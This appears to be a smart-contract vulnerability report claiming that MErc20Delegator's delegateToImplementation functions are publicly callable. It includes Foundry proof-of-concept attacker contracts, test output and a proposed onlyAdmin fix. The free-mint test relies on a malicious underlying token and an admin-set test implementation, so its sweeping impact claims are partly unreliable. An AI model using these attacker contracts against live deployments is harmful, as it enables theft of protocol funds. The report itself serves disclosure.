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##Summary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The delegateToImplementation function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the MErc20Delegator contract is publicly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accessible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(its ABI shows no access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Because delegatecall executes the implementation code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the delegator’s storage context, a non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admin caller can trigger arbitrary functions from the implementation that modify the delegator’s storage.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If the implementation contains initialization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sensitive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(such as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_becomeImplementation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mint,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other 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mutating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an attacker can exploit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to take over admin privileges, mint tokens, drain assets,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brick the contract.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##Root Cause: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Lack of access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control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(onlyAdmin) on delegateToImplementation.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The implementation acts as the execution target, exposing critical functionality such as transfer, transferFrom, mint, etc., without restrictions.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##Proof of Concept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DelegateAccess.t.sol) code :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---- Attacker contract for simulation external access ----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contract Attacker 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function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callDelegateToImpl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(address delegator, bytes memory payload)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public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bytes memory)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ok, bytes memory ret)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delegator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encodeWithSignature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"delegateToImplementation(bytes)"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payload));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(ok, ret);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function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callDelegateToViewImpl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(address delegator, bytes memory payload)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public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bytes memory)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ok, bytes memory ret)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delegator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encodeWithSignature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"delegateToViewImplementation(bytes)"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payload));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(ok, ret);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---- Test ----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contract DelegateAccessTest is DSTest {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MErc20Delegator delegator;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DummyComptroller comptroller;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DummyIRM irm;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Attacker attacker;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function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public {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comptroller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DummyComptroller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irm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DummyIRM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attacker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Attacker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Deploy dummy delegator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delegator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MErc20Delegator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0x1234567890000000000000000000000000000000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underlying dummy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ComptrollerInterface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(comptroller)),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InterestRateModel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(irm)),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initialExchangeRateMantissa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"SecToken"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uint160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admin = test contract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0x1234567890000000000000000000000000000000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dummy implementation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empty becomeImplementationData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--------- Tests ----------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Must revert if attacker tries to delegate directly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test_attacker_cannot_call_delegateToImplementation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public {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bytes memory payload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encodeWithSignature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"_becomeImplementation(bytes)"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ok, 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attacker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callDelegateToImpl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(delegator), payload);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Expect call to revert/return false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ok);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test_attacker_cannot_call_delegateToViewImplementation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public {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bytes memory payload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encodeWithSignature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"totalBorrows()"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ok, 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attacker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callDelegateToViewImpl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(delegator), payload);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ok);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Teset Result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forge test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contract DelegateAccessTest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vv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[⠊] Compiling...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 files changed, compilation skipped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Ran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tests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DelegateAccess.t.sol:DelegateAccessTest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[FAIL: assertTrue failed]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test_attacker_cannot_call_delegateToImplementation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(gas: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20430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[FAIL: assertTrue failed]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test_attacker_cannot_call_delegateToViewImplementation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(gas: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21867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Suite result: FAILED.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passed;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failed;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skipped; finished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6.94ms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326.20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µs CPU time)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Ran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test suite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124.52ms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6.94ms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CPU time):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tests passed,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failed,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skipped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total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Failing tests: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Encountered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failing tests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DelegateAccess.t.sol:DelegateAccessTest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[FAIL: assertTrue failed]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test_attacker_cannot_call_delegateToImplementation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(gas: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20430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[FAIL: assertTrue failed]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test_attacker_cannot_call_delegateToViewImplementation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(gas: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21867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Encountered a total of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failing tests,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tests succeeded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Expected behavior: both calls should revert.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Actual behavior: no revert occurred, proving public accessibility.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This confirms that delegateToImplementation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delegateToViewImplementation are callable by anyone.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Exploit Simulation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MintPoC.t.sol code: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Attacker contract that calls mint on the delegator */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contract Attacker {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function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doMint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(address delegator, uint256 amount) public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ok, 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delegator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encodeWithSignature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"mint(uint256)"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amount));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ok;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function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balanceOfMToken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(address delegator, address who) public view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(uint256) {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ok, bytes memory ret)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delegator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staticcall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encodeWithSignature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"balanceOf(address)"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who));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(ok);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(ret, (uint256));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contract MintPoCTest is DSTest {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MErc20Delegator token;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MaliciousUnderlying underlying;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PermissiveComptroller comptroller;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DummyIRM irm;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Attacker attacker;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function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public {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comptroller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PermissiveComptroller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irm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DummyIRM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attacker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Attacker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deploy malicious underlying and mint some "underlying" to attacker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underlying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MaliciousUnderlying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underlying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mintTo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ether);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underlying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mintTo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(attacker),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ether);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deploy DummyImplementation and use it as initial implementation to avoid ctor revert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DummyImplementation dummy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DummyImplementation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address dummyAddr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(dummy);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token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MErc20Delegator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(underlying),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ComptrollerInterface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(comptroller)),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InterestRateModel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(irm)),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"SecToken"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uint160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admin = test contract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0x1234567890000000000000000000000000000000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becomeImplementationData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now deploy PoC implementation and set as the new implementation via admin call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PoCImplementation impl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PoCImplementation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_setImplementation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(impl),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attacker approves token although transferFrom ignores balances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ok1, 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(underlying).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encodeWithSignature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"approve(address,uint256)"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(token),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ether)));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ok1;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function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test_attacker_can_free_mint_via_mint_wrapper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public {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beforeUnderlying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underlying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balanceOf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(attacker));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attacker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doMint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(token),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ether);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(ok);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mToken balance via delegator wrapper -&gt; delegateToViewImplementation -&gt; implementation.balanceOf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ok2, bytes memory ret)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(token).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staticcall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encodeWithSignature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"balanceOf(address)"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(attacker)));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(ok2);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mBal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(ret, (uint256));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afterUnderlying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underlying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balanceOf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(attacker));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emit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log_named_uint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"mToken balance after mint (attacker)"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mBal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emit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log_named_uint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"underlying balance before"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beforeUnderlying);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emit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log_named_uint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"underlying balance after"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afterUnderlying);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underlying must be unchanged (malicious underlying didn't deduct), and mToken balance must increase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(afterUnderlying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beforeUnderlying);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mBal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result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forge test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contract MintPoCTest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vvv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[⠊] Compiling...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 files changed, compilation skipped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Ran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test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MintPoC.t.sol:MintPoCTest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[PASS]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test_attacker_can_free_mint_via_mint_wrapper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(gas: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65330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Logs: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balance after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(attacker):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100000000000000000000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underlying balance before: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1000000000000000000000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underlying balance after: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1000000000000000000000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Suite result: ok.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passed;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failed;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skipped; finished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10.44ms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487.80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µs CPU time)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Ran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test suite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116.66ms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10.44ms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CPU time):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tests passed,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failed,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skipped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total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The attacker successfully minted tokens without reducing their underlying balance — confirming unrestricted delegatecall execution.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##Impact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Because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delegateToImplementation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(bytes) is publicly callable, an attacker can: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Execute arbitrary implementation functions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the delegator’s storage context.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Bypass admin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only restrictions.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Mint unlimited tokens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drain protocol funds.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Take over admin privileges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brick the contract permanently.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This vulnerability completely compromises the protocol’s trust model.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Recommendation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Restrict delegateToImplementation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delegateToViewImplementation with proper access control.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--- add modifier if not present ---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modifier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onlyAdmin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admin,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"MErc20Delegator: only admin"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_;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--- create internal helper (does the actual delegateTo) ---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_delegateToImplementation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(address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bytes memory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internal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(bytes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delegateTo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(impl, data);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--- public admin wrapper (only admin can call) ---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delegateToImplementation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(bytes memory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public onlyAdmin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(bytes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_delegateToImplementation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(implementation, data);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delegateToViewImplementation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(bytes memory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public view onlyAdmin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(bytes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implement view wrapper safely (if previously used)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success, bytes memory returnData)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staticcall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encodeWithSignature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"delegateToImplementation(bytes)"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data)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(success,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"delegateToViewImplementation failed"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returnData;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